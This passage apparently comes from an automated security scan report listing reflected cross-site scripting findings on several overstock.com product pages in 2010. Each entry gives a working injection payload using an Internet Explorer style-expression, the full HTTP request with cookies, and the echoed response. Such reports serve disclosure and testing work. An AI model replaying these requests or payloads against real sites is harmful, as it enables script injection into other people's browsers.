Set-Cookie: mxcproclicks=2684796|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:07 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408887415:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:07 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ex
...[SNIP]...
<input type="hidden" name="de180"style="x:expression(alert(1))"452ca6d83aa" value="1"/>
...[SNIP]...

2.109. http://www.overstock.com/Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984b8"style%3d"x%3aexpression(alert(1))"5b593c816ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 984b8"style="x:expression(alert(1))"5b593c816ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html?984b8"style%3d"x%3aexpression(alert(1))"5b593c816ca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:42 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:42 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=1562292|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:42 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408862200:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109156

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Hi
...[SNIP]...
<input type="hidden" name="984b8"style="x:expression(alert(1))"5b593c816ca" value="1"/>
...[SNIP]...

2.110. http://www.overstock.com/Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5f8"style%3d"x%3aexpression(alert(1))"73f60b7f756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee5f8"style="x:expression(alert(1))"73f60b7f756 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html?ee5f8"style%3d"x%3aexpression(alert(1))"73f60b7f756=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:10 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2897134|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408890614:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>La
...[SNIP]...
<input type="hidden" name="ee5f8"style="x:expression(alert(1))"73f60b7f756" value="1"/>
...[SNIP]...

2.111. http://www.overstock.com/Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5879"style%3d"x%3aexpression(alert(1))"060fcf6f53d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5879"style="x:expression(alert(1))"060fcf6f53d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html?f5879"style%3d"x%3aexpression(alert(1))"060fcf6f53d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:41 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2682544|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408861002:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=43
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115161

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>La
...[SNIP]...
<input type="hidden" name="f5879"style="x:expression(alert(1))"060fcf6f53d" value="1"/>
...[SNIP]...

2.112. http://www.overstock.com/Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c372"style%3d"x%3aexpression(alert(1))"e683909a5d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c372"style="x:expression(alert(1))"e683909a5d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html?1c372"style%3d"x%3aexpression(alert(1))"e683909a5d6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:41 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408860979:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: mxcproclicks=3053907|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=15
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>La
...[SNIP]...
<input type="hidden" name="1c372"style="x:expression(alert(1))"e683909a5d6" value="1"/>
...[SNIP]...

2.113. http://www.overstock.com/Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceb88"style%3d"x%3aexpression(alert(1))"e4019be7cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ceb88"style="x:expression(alert(1))"e4019be7cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html?ceb88"style%3d"x%3aexpression(alert(1))"e4019be7cd=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:00 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:00 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3320338|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:00 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408880023:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="ceb88"style="x:expression(alert(1))"e4019be7cd" value="1"/>
...[SNIP]...

2.114. http://www.overstock.com/Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e038a"style%3d"x%3aexpression(alert(1))"cd012eeeaa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e038a"style="x:expression(alert(1))"cd012eeeaa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html?e038a"style%3d"x%3aexpression(alert(1))"cd012eeeaa7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:58 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408878442:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3452453|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:58 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:58 GMT; Path=/
Keep-Alive: timeout=5, max=24
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Sw
...[SNIP]...
<input type="hidden" name="e038a"style="x:expression(alert(1))"cd012eeeaa7" value="1"/>
...[SNIP]...

2.115. http://www.overstock.com/Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98463"style%3d"x%3aexpression(alert(1))"3f7e759d8e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98463"style="x:expression(alert(1))"3f7e759d8e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html?98463"style%3d"x%3aexpression(alert(1))"3f7e759d8e0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:38 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:38 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408858839:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:38 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1433549|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:38 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=43
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108937

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Un
...[SNIP]...
<input type="hidden" name="98463"style="x:expression(alert(1))"3f7e759d8e0" value="1"/>
...[SNIP]...

2.116. http://www.overstock.com/Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
